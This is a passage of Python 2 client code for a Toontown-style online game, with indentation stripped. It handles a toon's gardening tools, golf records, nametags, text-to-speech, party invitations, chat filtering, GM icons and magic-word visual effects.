shovels = loader.loadModel('phase_5.5/models/estate/shovels')
shovelId = ['A',
'B',
'C',
'D'][self.shovel]
shovel = shovels.find('**/shovel' + shovelId)
shovel.setH(-90)
shovel.setP(216)
shovel.setX(0.2)
shovel.detachNode()
shovels.removeNode()
return shovel
def setShovelSkill(self, skillLevel):
self.shovelSkill = skillLevel
def getBoxCapability(self):
return GardenGlobals.getShovelPower(self.shovel, self.shovelSkill)
def setWateringCan(self, wateringCanId):
self.wateringCan = wateringCanId
def attachWateringCan(self):
self.wateringCanModel = self.getWateringCanModel()
self.wateringCanModel.reparentTo(self.rightHand)
return self.wateringCanModel
def detachWateringCan(self):
if self.wateringCanModel:
self.wateringCanModel.removeNode()
def getWateringCanModel(self):
scalePosHprsTable = ((0.25, 0.1, 0, 0.2, -90, -125, -45),
(0.2, 0.0, 0.25, 0.2, -90, -125, -45),
(0.2, 0.2, 0.1, 0.2, -90, -125, -45),
(0.2, 0.0, 0.25, 0.2, -90, -125, -45))
cans = loader.loadModel('phase_5.5/models/estate/watering_cans')
canId = ['A',
'B',
'C',
'D'][self.wateringCan]
can = cans.find('**/water_can' + canId)
can.setScale(scalePosHprsTable[self.wateringCan][0])
can.setPos(scalePosHprsTable[self.wateringCan][1], scalePosHprsTable[self.wateringCan][2], scalePosHprsTable[self.wateringCan][3])
can.setHpr(scalePosHprsTable[self.wateringCan][4], scalePosHprsTable[self.wateringCan][5], scalePosHprsTable[self.wateringCan][6])
can.detachNode()
cans.removeNode()
if hasattr(base, 'rwc'):
if base.rwc:
if hasattr(self, 'wateringCan2'):
self.wateringCan2.removeNode()
self.wateringCan2 = can.copyTo(self.rightHand)
else:
self.wateringCan2.removeNode()
return can
def setWateringCanSkill(self, skillLevel):
self.wateringCanSkill = skillLevel
def setGardenSpecials(self, specials):
self.gardenSpecials = specials
if hasattr(self, 'gardenPage') and self.gardenPage:
self.gardenPage.updatePage()
def getGardenSpecials(self):
return self.gardenSpecials
def getMyTrees(self):
treeDict = self.cr.getObjectsOfClass(DistributedGagTree.DistributedGagTree)
trees = []
for tree in treeDict.values():
if tree.getOwnerId() == self.doId:
trees.append(tree)
if not trees:
pass
return trees
def isTreePlanted(self, track, level):
trees = self.getMyTrees()
for tree in trees:
if tree.gagTrack == track and tree.gagLevel == level:
return True
return False
def doIHaveRequiredTrees(self, track, level):
trees = self.getMyTrees()
trackAndLevelList = []
for tree in trees:
trackAndLevelList.append((tree.gagTrack, tree.gagLevel))
haveRequired = True
for curLevel in xrange(level):
testTuple = (
track, curLevel)
if testTuple not in trackAndLevelList:
haveRequired = False
break
return haveRequired
def setTrackBonusLevel(self, trackArray):
self.trackBonusLevel = trackArray
if self.inventory:
self.inventory.updateGUI()
def getTrackBonusLevel(self, track=None):
if track == None:
return self.trackBonusLevel
else:
return self.trackBonusLevel[track]
return
def checkGagBonus(self, track, level):
trackBonus = self.getTrackBonusLevel(track)
return trackBonus >= level
def setGardenTrophies(self, trophyList):
self.gardenTrophies = trophyList
def getGardenTrophies(self):
return self.gardenTrophies
def useSpecialResponse(self, returnCode):
messenger.send('use-special-response', [returnCode])
def setGardenStarted(self, bStarted):
self.gardenStarted = bStarted
def getGardenStarted(self):
return self.gardenStarted
def sendToGolfCourse(self, zoneId):
print 'sending to golfCourse'
hoodId = self.cr.playGame.hood.hoodId
golfRequest = {'loader': 'safeZoneLoader', 'where': 'golfcourse',
'how': 'teleportIn',
'hoodId': hoodId,
'zoneId': zoneId,
'shardId': None,
'avId': -1}
base.cr.playGame.getPlace().requestLeave(golfRequest)
return
def getGolfTrophies(self):
return self.golfTrophies
def getGolfCups(self):
return self.golfCups
def setGolfHistory(self, history):
self.golfHistory = history
self.golfTrophies = GolfGlobals.calcTrophyListFromHistory(self.golfHistory)
self.golfCups = GolfGlobals.calcCupListFromHistory(self.golfHistory)
if hasattr(self, 'book'):
self.addGolfPage()
def getGolfHistory(self):
return self.golfHistory
def hasPlayedGolf(self):
retval = False
for historyValue in self.golfHistory:
if historyValue:
retval = True
break
return retval
def setPackedGolfHoleBest(self, packedHoleBest):
unpacked = GolfGlobals.unpackGolfHoleBest(packedHoleBest)
self.setGolfHoleBest(unpacked)
def setGolfHoleBest(self, holeBest):
self.golfHoleBest = holeBest
def getGolfHoleBest(self):
return self.golfHoleBest
def setGolfCourseBest(self, courseBest):
self.golfCourseBest = courseBest
def getGolfCourseBest(self):
return self.golfCourseBest
def setUnlimitedSwing(self, unlimitedSwing):
self.unlimitedSwing = unlimitedSwing
def getUnlimitedSwing(self):
return self.unlimitedSwing
def getPinkSlips(self):
if hasattr(self, 'pinkSlips'):
return self.pinkSlips
else:
return 0
def setPinkSlips(self, pinkSlips):
self.pinkSlips = pinkSlips
def setAccess(self, access):
self.setGameAccess(access)
self.setDisplayName(self.getName())
def setGameAccess(self, access):
self.gameAccess = access
def getGameAccess(self):
if hasattr(self, 'gameAccess'):
return self.gameAccess
else:
return 0
def setDisplayName(self, str):
if not self.isDisguised:
self.setFancyNametag(name=str)
else:
self.removeFancyNametag()
Avatar.Avatar.setDisplayName(self, str)
def setFancyNametag(self, name=None):
if name == None:
name = self.getName()
if self.getNametagStyle() == 100:
self.setFont(ToontownGlobals.getToonFont())
else:
self.setFont(ToontownGlobals.getNametagFont(self.getNametagStyle()))
Avatar.Avatar.setDisplayName(self, name)
self.setFont(ToontownGlobals.getToonFont())
return
def removeFancyNametag(self):
self.nametag.clearShadow()
def getNametagStyle(self):
if hasattr(self, 'nametagStyle'):
return self.nametagStyle
else:
return 0
def setNametagStyle(self, nametagStyle):
if base.config.GetBool('want-nametag-avids', 0):
nametagStyle = 0
self.nametagStyle = nametagStyle
self.setDisplayName(self.getName())
def getAvIdName(self):
paidStr = PythonUtil.choice(self.getGameAccess() == OTPGlobals.AccessFull, 'P', 'F')
return '%s\n%s (%s)' % (self.getName(), self.doId, paidStr)
def getTTSVolume(self):
avatarPos = self.getPos(base.localAvatar)
result = int(round((avatarPos[0] + avatarPos[1]) / 2))
if result > 100:
result = 100
elif result < 0:
result = 0
volumeList = range(100, -1, -1)
return volumeList[result]
def playCurrentDialogue(self, dialogue, chatFlags, interrupt=1):
reality = False
if chatFlags & CFExclaim == 512:
reality = True
if interrupt and self.__currentDialogue is not None:
self.__currentDialogue.stop()
self.__currentDialogue = dialogue
if dialogue:
base.playSfx(dialogue, node=self)
elif chatFlags & CFSpeech != 0 or chatFlags & CFExclaim == 512:
if self.nametag.getNumChatPages() > 0:
self.playDialogueForString(self.nametag.getChat(), exclaim=reality)
if self.soundChatBubble != None:
base.playSfx(self.soundChatBubble, node=self)
elif self.nametag.getChatStomp() > 0:
self.playDialogueForString(self.nametag.getStompText(), self.nametag.getStompDelay(), exclaim=reality)
return
def playDialogueForString(self, chatString, delay=0.0, exclaim=False):
if len(chatString) == 0:
return
searchString = chatString.lower()
if searchString.find(OTPLocalizer.DialogSpecial) >= 0:
type = 'special'
elif searchString.find(OTPLocalizer.DialogExclamation) >= 0 or exclaim:
type = 'exclamation'
elif searchString.find(OTPLocalizer.DialogQuestion) >= 0:
type = 'question'
elif random.randint(0, 1):
type = 'statementA'
else:
type = 'statementB'
stringLength = len(chatString)
if stringLength <= OTPLocalizer.DialogLength1:
length = 1
elif stringLength <= OTPLocalizer.DialogLength2:
length = 2
elif stringLength <= OTPLocalizer.DialogLength3:
length = 3
else:
length = 4
self.playDialogue(type, length, chatString, delay)
def playDialogue(self, type, length, chatString='', delay=0.0):
if base.textToSpeech:
chatString = chatString.replace('WLDisplay', '')
soundSequence = Sequence(Wait(delay), Func(self.playTTS, chatString))
self.soundSequenceList.append(soundSequence)
soundSequence.start()
self.cleanUpSoundList()
return
else:
dialogueArray = self.getDialogueArray()
if dialogueArray == None:
return
sfxIndex = None
if type == 'statementA' or type == 'statementB':
if length == 1:
sfxIndex = 0
elif length == 2:
sfxIndex = 1
elif length >= 3:
sfxIndex = 2
elif type == 'question':
sfxIndex = 3
elif type == 'exclamation':
sfxIndex = 4
elif type == 'special':
sfxIndex = 5
else:
self.notify.error('unrecognized dialogue type: ', type)
if sfxIndex != None and sfxIndex < len(dialogueArray) and dialogueArray[sfxIndex] != None:
soundSequence = Sequence(Wait(delay), SoundInterval(dialogueArray[sfxIndex], node=None, listenerNode=base.localAvatar, loop=0, volume=1.0))
self.soundSequenceList.append(soundSequence)
soundSequence.start()
self.cleanUpSoundList()
return
def playTTS(self, chatString):
try:
animalType = self.style.getType()
if self.getTTSVolume() == 0:
return
if sys.platform == 'darwin':
if animalType in ToontownGlobals.Species2Voice.keys():
voice = ToontownGlobals.Species2Voice[animalType]
else:
voice = ToontownGlobals.DefaultVoice
Popen(['say', voice, chatString])
else:
if animalType in ToontownGlobals.Species2Pitch.keys():
pitch = '-p' + str(ToontownGlobals.Species2Pitch[animalType])
else:
pitch = '-p' + str(ToontownGlobals.DefaultPitch)
volume = '-a' + str(self.getTTSVolume())
Popen([base.textToSpeechPath, pitch, volume, '-ven', chatString])
return
except:
base.resetTextToSpeech()
self.setSystemMessage(0, TTLocalizer.TextToSpeechWarning)
return
def cleanUpSoundList(self):
removeList = []
for soundSequence in self.soundSequenceList:
if soundSequence.isStopped():
removeList.append(soundSequence)
for soundSequence in removeList:
self.soundSequenceList.remove(soundSequence)
def sendLogMessage(self, message):
self.sendUpdate('logMessage', [message])
def setChatAbsolute(self, chatString, chatFlags, dialogue=None, interrupt=1, quiet=0):
DistributedAvatar.DistributedAvatar.setChatAbsolute(self, chatString, chatFlags, dialogue, interrupt)
def setChatMuted(self, chatString, chatFlags, dialogue=None, interrupt=1, quiet=0):
self.nametag.setChat(chatString, chatFlags)
self.playCurrentDialogue(dialogue, chatFlags - CFSpeech, interrupt)
def displayTalk(self, chatString, mods=None):
flags = CFSpeech | CFTimeout
if base.talkAssistant.isThought(chatString):
flags = CFThought
chatString = base.talkAssistant.removeThoughtPrefix(chatString)
elif base.talkAssistant.isExclaim(chatString):
flags = CFExclaim | CFTimeout
chatString = base.talkAssistant.removeExclaimPrefix(chatString)
self.nametag.setChat(chatString, flags)
if base.toonChatSounds:
self.playCurrentDialogue(None, flags, interrupt=1)
return
def setMail(self, mail):
DistributedToon.partyNotify.debug('setMail called with %d mail items' % len(mail))
self.mail = []
for i in xrange(len(mail)):
oneMailItem = mail[i]
newMail = SimpleMailBase(*oneMailItem)
self.mail.append(newMail)
def setSimpleMailNotify(self, simpleMailNotify):
DistributedToon.partyNotify.debug('setSimpleMailNotify( %s )' % simpleMailNotify)
self.simpleMailNotify = simpleMailNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
def setInviteMailNotify(self, inviteMailNotify):
DistributedToon.partyNotify.debug('setInviteMailNotify( %s )' % inviteMailNotify)
self.inviteMailNotify = inviteMailNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
def setInvites(self, invites):
DistributedToon.partyNotify.debug('setInvites called passing in %d invites.' % len(invites))
self.invites = []
for i in xrange(len(invites)):
oneInvite = invites[i]
newInvite = InviteInfo(*oneInvite)
self.invites.append(newInvite)
def updateInviteMailNotify(self):
invitesInMailbox = self.getInvitesToShowInMailbox()
newInvites = 0
readButNotRepliedInvites = 0
for invite in invitesInMailbox:
if invite.status == PartyGlobals.InviteStatus.NotRead:
newInvites += 1
elif invite.status == PartyGlobals.InviteStatus.ReadButNotReplied:
readButNotRepliedInvites += 1
if __dev__:
partyInfo = self.getOnePartyInvitedTo(invite.partyId)
if not partyInfo:
self.notify.error('party info not found in partiesInvtedTo, partyId = %s' % str(invite.partyId))
if newInvites:
self.setInviteMailNotify(ToontownGlobals.NewItems)
elif readButNotRepliedInvites:
self.setInviteMailNotify(ToontownGlobals.OldItems)
else:
self.setInviteMailNotify(ToontownGlobals.NoItems)
def getInvitesToShowInMailbox(self):
result = []
for invite in self.invites:
appendInvite = True
if invite.status == InviteStatus.Accepted or invite.status == InviteStatus.Rejected:
appendInvite = False
if appendInvite:
partyInfo = self.getOnePartyInvitedTo(invite.partyId)
if not partyInfo:
appendInvite = False
if appendInvite:
if partyInfo.status == PartyGlobals.PartyStatus.Cancelled:
appendInvite = False
if appendInvite:
endDate = partyInfo.endTime.date()
curDate = base.cr.toontownTimeManager.getCurServerDateTime().date()
if endDate < curDate:
appendInvite = False
if appendInvite:
result.append(invite)
return result
def getNumInvitesToShowInMailbox(self):
result = len(self.getInvitesToShowInMailbox())
return result
def setHostedParties(self, hostedParties):
DistributedToon.partyNotify.debug('setHostedParties called passing in %d parties.' % len(hostedParties))
self.hostedParties = []
for i in xrange(len(hostedParties)):
hostedInfo = hostedParties[i]
newParty = PartyInfo(*hostedInfo)
self.hostedParties.append(newParty)
def setPartiesInvitedTo(self, partiesInvitedTo):
DistributedToon.partyNotify.debug('setPartiesInvitedTo called passing in %d parties.' % len(partiesInvitedTo))
self.partiesInvitedTo = []
for i in xrange(len(partiesInvitedTo)):
partyInfo = partiesInvitedTo[i]
newParty = PartyInfo(*partyInfo)
self.partiesInvitedTo.append(newParty)
self.updateInviteMailNotify()
def getOnePartyInvitedTo(self, partyId):
result = None
for i in xrange(len(self.partiesInvitedTo)):
partyInfo = self.partiesInvitedTo[i]
if partyInfo.partyId == partyId:
result = partyInfo
break
return result
def getInviteForPartyId(self, partyId):
result = None
for invite in self.invites:
if invite.partyId == partyId:
result = invite
break
return result
def setPartyReplies(self, replies):
DistributedToon.partyNotify.debug('setPartyReplies called passing in %d parties.' % len(replies))
self.partyReplyInfoBases = []
for i in xrange(len(replies)):
partyReply = replies[i]
repliesForOneParty = PartyReplyInfoBase(*partyReply)
self.partyReplyInfoBases.append(repliesForOneParty)
def setPartyCanStart(self, partyId):
DistributedToon.partyNotify.debug('setPartyCanStart called passing in partyId=%s' % partyId)
for partyInfo in self.hostedParties:
if partyInfo.partyId == partyId:
partyInfo.status = PartyGlobals.PartyStatus.CanStart
from toontown.shtiker import EventsPage
if hasattr(self, 'eventsPage') and base.localAvatar.book.entered and base.localAvatar.book.isOnPage(self.eventsPage) and self.eventsPage.getMode() == EventsPage.EventsPage_Host:
base.localAvatar.eventsPage.loadHostedPartyInfo()
if hasattr(self, 'displaySystemClickableWhisper'):
self.displaySystemClickableWhisper(0, TTLocalizer.PartyCanStart, whisperType=WhisperPopup.WTSystem)
else:
self.setSystemMessage(0, TTLocalizer.PartyCanStart)
def setPartyStatus(self, partyId, newStatus):
DistributedToon.partyNotify.debug('setPartyCanStatus called passing in partyId=%s status=%s' % (partyId, newStatus))
found = False
for partyInfo in self.hostedParties:
if partyInfo.partyId == partyId:
partyInfo.status = newStatus
found = True
break
for partyInfo in self.partiesInvitedTo:
if partyInfo.partyId == partyId:
partyInfo.status = newStatus
found = True
from toontown.shtiker import EventsPage
if hasattr(self, 'eventsPage') and base.localAvatar.book.entered and base.localAvatar.book.isOnPage(self.eventsPage) and self.eventsPage.getMode() == EventsPage.EventsPage_Invited:
base.localAvatar.eventsPage.loadInvitations()
if newStatus == PartyStatus.Started and hasattr(self, 'displaySystemClickableWhisper'):
invite = self.getInviteForPartyId(partyId)
if invite:
name = ' '
host = base.cr.identifyAvatar(partyInfo.hostId)
if host:
name = host.getName()
if invite.status == InviteStatus.Accepted:
displayStr = TTLocalizer.PartyHasStartedAcceptedInvite % TTLocalizer.GetPossesive(name)
self.displaySystemClickableWhisper(-1, displayStr, whisperType=WhisperPopup.WTSystem)
else:
displayStr = TTLocalizer.PartyHasStartedNotAcceptedInvite % TTLocalizer.GetPossesive(name)
self.setSystemMessage(partyInfo.hostId, displayStr, whisperType=WhisperPopup.WTSystem)
break
if not found:
self.notify.warning("setPartyCanStart can't find partyId=% status=%d" % (partyId, newStatus))
def announcePartyStarted(self, partyId):
DistributedToon.partyNotify.debug('announcePartyStarted')
return
for partyReplyInfo in self.partyReplyInfoBases:
if partyReplyInfo.partyId == partyId:
for singleReply in partyReplyInfo.replies:
toonId = singleReply.inviteeId
if base.cr.isFriend(toonId):
if base.cr.isFriendOnline(toonId):
if singleReply.status == InviteStatus.Accepted:
self.whisperSCTo(5302, toonId, 0)
else:
self.whisperSCTo(5302, toonId, 0)
def updateInvite(self, inviteKey, newStatus):
DistributedToon.partyNotify.debug('updateInvite( inviteKey=%d, newStatus=%s )' % (inviteKey, InviteStatus.getString(newStatus)))
for invite in self.invites:
if invite.inviteKey == inviteKey:
invite.status = newStatus
self.updateInviteMailNotify()
break
def updateReply(self, partyId, inviteeId, newStatus):
DistributedToon.partyNotify.debug('updateReply( partyId=%d, inviteeId=%d, newStatus=%s )' % (partyId, inviteeId, InviteStatus.getString(newStatus)))
for partyReplyInfoBase in self.partyReplyInfoBases:
if partyReplyInfoBase.partyId == partyId:
for reply in partyReplyInfoBase.replies:
if reply.inviteeId == inviteeId:
reply.status = newStatus
break
def scrubTalk(self, message, mods, raw):
scrubbed = 0
text = copy.copy(message)
for mod in mods:
index = mod[0]
length = mod[1] - mod[0] + 1
newText = text[0:index] + length * '\x07' + text[index + length:]
text = newText
for friendId, flags in self.friendsList:
if flags & ToontownGlobals.FriendChat:
text = copy.copy(raw)
if not self.isLocal() and self.playerType in [NametagGroup.CCNormal, NametagGroup.CCFreeChat]:
text = copy.copy(raw)
words = text.split(' ')
newwords = []
i = 0
for word in words:
if word == '':
newwords.append(word)
elif word == '.' and len(words) == 1:
newwords.append(word)
elif (word.startswith('.') or word.startswith('!')) and len(word) > 1 and i == 0:
if word[0] == '\x07' or len(word) > 1 and word[1] == '\x07':
newwords.append(word[0] + '\x01WLDisplay\x01' + self.chatGarbler.garbleSingle(self, word) + '\x02')
else:
flag = 0
for friendId, flags in self.friendsList:
if not flags & ToontownGlobals.FriendChat:
flag = 1
if flag:
newwords.append(word[0] + '\x01WLDisplay\x01' + word[1:] + '\x02')
else:
newwords.append(word)
scrubbed = 1
elif word[0] == '\x07' or len(word) > 1 and word[1] == '\x07':
newwords.append('\x01WLDisplay\x01' + self.chatGarbler.garbleSingle(self, word) + '\x02')
scrubbed = 1
elif base.whiteList.isWord(word):
newwords.append(word)
else:
flag = 0
for friendId, flags in self.friendsList:
if not flags & ToontownGlobals.FriendChat:
flag = 1
if flag:
scrubbed = 1
newwords.append('\x01WLDisplay\x01' + word + '\x02')
else:
newwords.append(word)
i += 1
newText = (' ').join(newwords)
return (
newText, scrubbed)
def replaceBadWords(self, text):
words = text.split(' ')
newwords = []
for word in words:
if word == '':
newwords.append(word)
elif word[0] == '\x07':
newwords.append('\x01WLRed\x01' + self.chatGarbler.garbleSingle(self, word) + '\x02')
elif base.whiteList.isWord(word):
newwords.append(word)
else:
newwords.append('\x01WLRed\x01' + word + '\x02')
newText = (' ').join(newwords)
return newText
def toonUp(self, hpGained, hasInteractivePropBonus=False):
if self.hp == None or hpGained < 0:
return
oldHp = self.hp
if self.hp + hpGained <= 0:
self.hp += hpGained
else:
self.hp = min(max(self.hp, 0) + hpGained, self.maxHp)
hpGained = self.hp - max(oldHp, 0)
if hpGained > 0:
self.showHpText(hpGained, hasInteractivePropBonus=hasInteractivePropBonus)
self.hpChange(quietly=0)
return
def showHpText(self, number, bonus=0, scale=1, hasInteractivePropBonus=False):
if self.HpTextEnabled and not self.ghostMode:
if number != 0:
if self.hpText:
self.hideHpText()
self.HpTextGenerator.setFont(OTPGlobals.getSignFont())
if number < 0:
self.HpTextGenerator.setText(str(number))
else:
hpGainedStr = '+' + str(number)
if hasInteractivePropBonus:
hpGainedStr += '\n' + TTLocalizer.InteractivePropTrackBonusTerms[0]
self.HpTextGenerator.setText(hpGainedStr)
self.HpTextGenerator.clearShadow()
self.HpTextGenerator.setAlign(TextNode.ACenter)
if bonus == 1:
r = 1.0
g = 1.0
b = 0
a = 1
elif bonus == 2:
r = 1.0
g = 0.5
b = 0
a = 1
elif number < 0:
r = 0.9
g = 0
b = 0
a = 1
else:
r = 0
g = 0.9
b = 0
a = 1
self.HpTextGenerator.setTextColor(r, g, b, a)
self.hpTextNode = self.HpTextGenerator.generate()
self.hpText = self.attachNewNode(self.hpTextNode)
self.hpText.setScale(scale)
self.hpText.setBillboardPointEye()
self.hpText.setBin('fixed', 100)
self.hpText.setPos(0, 0, self.height / 2)
seq = Sequence(self.hpText.posInterval(1.0, Point3(0, 0, self.height + 1.5), blendType='easeOut'), Wait(0.85), self.hpText.colorInterval(0.1, Vec4(r, g, b, 0)), Func(self.hideHpText))
seq.start()
def setAnimPlayRate(self, rate):
if self.getIsTransformed():
actor = self.getActiveTransformation()
actor.setPlayRate(rate, self.playingAnim)
else:
self.setPlayRate(rate, self.playingAnim)
if rate == 1:
self.forcedRate = -1
else:
self.forcedRate = rate
def setName(self, name='unknownDistributedAvatar'):
DistributedPlayer.DistributedPlayer.setName(self, name)
self._handleGMName(name)
base.cr.discordManager.setSmallImageText(base.cr.discordManager.getSmallImageText())
def _handleGMName(self, name=None):
if not name:
name = self.name
self.setDisplayName(name)
if self._isGM:
self.setGMIcon(self._gmType)
else:
self.removeGMIcon()
self.setNametagStyle(self.getNametagStyle())
def setGMIcon(self, gmType=None):
if hasattr(self, 'gmIcon') and self.gmIcon:
return
if not gmType:
gmType = self._gmType
iconInfo = (
('phase_3.5/models/gui/tt_m_gui_gm_toontroop_whistle', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_1.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', '**/*fistIcon*', 'phase_3.5/maps/gamegui_palette_3clla_1.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_1.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toontroop_whistle', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_2.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', '**/*fistIcon*', 'phase_3.5/maps/gamegui_palette_3clla_2.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_2.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', '**/*fistIcon*', 'phase_3.5/maps/gamegui_palette_3clla_3.jpg',
4),
('phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_3.jpg',
4))
if gmType > len(iconInfo) - 1:
return
modelName, searchString, texture, scale = iconInfo[gmType]
icons = loader.loadModel(modelName)
self.gmIcon = icons.find(searchString)
ts = self.gmIcon.findTextureStage('*')
tex = loader.loadTexture(texture)
self.gmIcon.setTexture(ts, tex, 1)
self.gmIcon.setScale(scale)
self.gmIcon.reparentTo(self.nametag.getNameIcon())
self.setTrophyScore(self.trophyScore)
self.gmIcon.setZ(-2.5)
self.gmIcon.setY(0.0)
self.gmIcon.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
self.gmIcon.setTransparency(1)
self.gmIconInterval = LerpHprInterval(self.gmIcon, 3.0, Point3(0, 0, 0), Point3(-360, 0, 0))
self.gmIconInterval.loop()
def setGMPartyIcon(self):
gmType = self._gmType
iconInfo = ('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', 'phase_3.5/models/gui/tt_m_gui_gm_toontroop_whistle',
'phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', 'phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected')
if gmType > len(iconInfo) - 1:
return
self.gmIcon = loader.loadModel(iconInfo[gmType])
self.gmIcon.reparentTo(self.nametag.getNameIcon())
self.gmIcon.setScale(3.25)
self.setTrophyScore(self.trophyScore)
self.gmIcon.setZ(1.0)
self.gmIcon.setY(0.0)
self.gmIcon.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
self.gmIcon.setTransparency(1)
self.gmIconInterval = LerpHprInterval(self.gmIcon, 3.0, Point3(0, 0, 0), Point3(-360, 0, 0))
self.gmIconInterval.loop()
def removeGMIcon(self):
if hasattr(self, 'gmIconInterval') and self.gmIconInterval:
self.gmIconInterval.finish()
del self.gmIconInterval
if hasattr(self, 'gmIcon') and self.gmIcon:
self.gmIcon.detachNode()
del self.gmIcon
def _startZombieCheck(self):
self._zombieCheckSerialGen = SerialNumGen(random.randrange(2147483648L))
taskMgr.doMethodLater(2.0 + 60.0 * random.random(), self._doZombieCheck, self._getZombieCheckTaskName())
def _stopZombieCheck(self):
taskMgr.remove(self._getZombieCheckTaskName())
def _getZombieCheckTaskName(self):
return self.uniqueName('zombieCheck')
def _doZombieCheck(self, task=None):
self._lastZombieContext = self._zombieCheckSerialGen.next()
self.cr.timeManager.checkAvOnDistrict(self, self._lastZombieContext)
taskMgr.doMethodLater(60.0, self._doZombieCheck, self._getZombieCheckTaskName())
def _zombieCheckResult(self, context, present):
if context == self._lastZombieContext:
print '_zombieCheckResult[%s]: %s' % (self.doId, present)
if not present:
self.notify.warning('hiding av %s because they are not on the district!' % self.doId)
self.setParent(OTPGlobals.SPHidden)
def setFriendsList(self, friendsList):
DistributedPlayer.DistributedPlayer.setFriendsList(self, friendsList)
for friendId, trueFriend in self.friendsList:
if (
friendId, trueFriend) in self.oldFriendsList:
continue
friend = self.cr.doId2do.get(friendId)
if friend:
base.cr.ttoffFriendsManager.friendOnline(friendId, 0, 0, False)
for friendPair in self.oldFriendsList:
if friendPair in self.friendsList:
continue
if type(friendPair) == tuple:
friendId = friendPair[0]
else:
friendId = friendPair
friend = self.cr.doId2do.get(friendId)
if not friend:
continue
if hasattr(base.localAvatar, 'inEstate') and base.localAvatar.inEstate:
base.cr.estateMgr.removeFriend(self.getDoId(), friendId)
def setImmortalMode(self, flag):
self.immoralMode = flag
messenger.send(self.uniqueName('magicWordChange'), [1, flag])
def getImmortalMode(self):
return self.immortalMode
def setUnlimitedGags(self, flag):
self.unlimitedGags = flag
messenger.send(self.uniqueName('magicWordChange'), [0, flag])
def getUnlimitedGags(self):
return self.unlimitedGags
def setInstaKill(self, flag):
self.instaKill = flag
messenger.send(self.uniqueName('magicWordChange'), [2, flag])
def getInstaKill(self):
return self.instaKill
def setRun(self):
if self.isLocal():
inputState.set('debugRunning', inputState.isSet('debugRunning') is not True)
def generateRainbow(self):
intervalName = 'RainbowSeq'
if self.activeIntervals.has_key(intervalName):
self.destroyRainbow()
return
red = (1.0, 0.0, 0.0, 1.0)
orange = (0.898, 0.42, 0.024, 1.0)
yellow = (0.945, 0.957, 0.259, 1.0)
green = (0.0, 1.0, 0.0, 1.0)
blue = (0.0, 0.0, 1.0, 1.0)
indigo = (0.247, 0.0, 1.0, 1.0)
violet = (0.498, 0.0, 1.0, 1.0)
rainbowSeq = Parallel()
for node in (render, render2d, aspect2d):
rainbowSeq.append(Sequence(LerpColorScaleInterval(node, 0.5, red), LerpColorScaleInterval(node, 0.5, orange), LerpColorScaleInterval(node, 0.5, yellow), LerpColorScaleInterval(node, 0.5, green), LerpColorScaleInterval(node, 0.5, blue), LerpColorScaleInterval(node, 0.5, indigo), LerpColorScaleInterval(node, 0.5, violet)))
rainbowSeq.loop()
intervalName = 'RainbowSeq'
self.storeInterval(rainbowSeq, intervalName)
def destroyRainbow(self):
intervalName = 'RainbowSeq'
self.clearInterval(intervalName)
for node in (render, render2d, aspect2d):
node.clearColorScale()
def generateFanfare(self):
from toontown.battle import Fanfare
fanfare = Sequence(Fanfare.makeFanfare(0, self)[0])
fanfare.start()
def generateTrolley(self, timestamp):
station = loader.loadModel('phase_4/models/modules/trolley_station_TT')
trolley = station.find('**/trolley_car')
trolley.setZ(100)
trolley.reparentTo(self)
station.removeNode()
dropSfx = loader.loadSfx('phase_5/audio/sfx/cogbldg_drop.ogg')
landSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_boat_cog.ogg')
trolleySfx = loader.loadSfx('phase_4/audio/sfx/MG_sfx_travel_game_bell_for_trolley.ogg')
fadeSfx = loader.loadSfx('phase_4/audio/sfx/SZ_trolley_bell.ogg')
magicTrolleySeq = Sequence(Func(base.playSfx, dropSfx), Parallel(trolley.scaleInterval(7, (1,
1,
1)), trolley.posInterval(7, (0,
0,
0))), Func(self.setAnimState, 'Squish'), Func(base.playSfx, landSfx), Func(base.playSfx, trolleySfx, 0, 1, 1.5), trolley.posInterval(0.1, (0,
0,
0.5)), trolley.posInterval(0.1, (0,
0,
0)), Wait(0.4), Func(base.playSfx, fadeSfx, 0, 1, 1.5), trolley.scaleInterval(1, (0,
0,
0)), Func(trolley.removeNode), Wait(1.3), Func(self.setAnimState, 'neutral'))
ts = globalClockDelta.localElapsedTime(timestamp)
magicTrolleySeq.start(ts)
def generateBrowserEasterEgg(self, index):
if not index:
webbrowser.open('https://www.infowars.com/')
elif index == 1:
webbrowser.open('https://www.msnbc.com/')
webbrowser.open('https://www.cnn.com/')
def generateGreenEffect(self, character='f', toonId=0):
intervalName = 'GreenSeq'
cogTypes = [
TTLocalizer.SellbotP.lower(), TTLocalizer.CashbotP.lower(), TTLocalizer.LawbotP.lower(), TTLocalizer.BossbotP.lower()]
if character in cogTypes:
cogFlyInPos = ToontownGlobals.GreenEffectMassFlyPositions
cogList = ToontownGlobals.GreenEffectMassFlyCogs
seq = Parallel()
for x in range(len(cogFlyInPos)):
cog = ToontownAvatarUtils.createCog(cogList[cogTypes.index(character)][x], self.getX() + cogFlyInPos[x][0], self.getY() + cogFlyInPos[x][1], self.getZ(), 0, 0, 0, parent=hidden)
cogFlyIn = cog.beginSupaFlyMove(VBase3(self.getX() + cogFlyInPos[x][0], self.getY() + cogFlyInPos[x][1], self.getZ()), 1, 'flyIn')
